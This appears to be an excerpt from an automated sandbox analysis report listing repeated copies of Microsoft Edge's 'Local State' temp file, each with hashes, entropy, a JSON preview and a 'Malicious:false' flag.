                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF370cc.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3710a.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3737b.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF399a1.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ab35.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ac00.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3ac1f.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3d245.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF483c3.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBM+wuF9hDO6vP6O+htbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE068tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                  MD5:2822A7749035D391154BCDF384344D3C
                                                                                                                                                                                                                                                                  SHA1:2E4E5FD0505BC9281D7CF6B855ED9916FE0439A0
                                                                                                                                                                                                                                                                  SHA-256:6D38B4537085986B4E320AE42E1AD5A8A6007508D112E9A4EC510F9643E68129
                                                                                                                                                                                                                                                                  SHA-512:16FC4DBFDFC9200D000AF5F9919FF2C06F792254443BC470FD74976A63DC8D4ABE8AF026DF852592D003FBC2449D0E9EB3A842601B38A43F60D486D3F222059D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4df21.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                  Entropy (8bit):6.090752586172201
                                                                                                                                                                                                                                                                  Encrypted:false
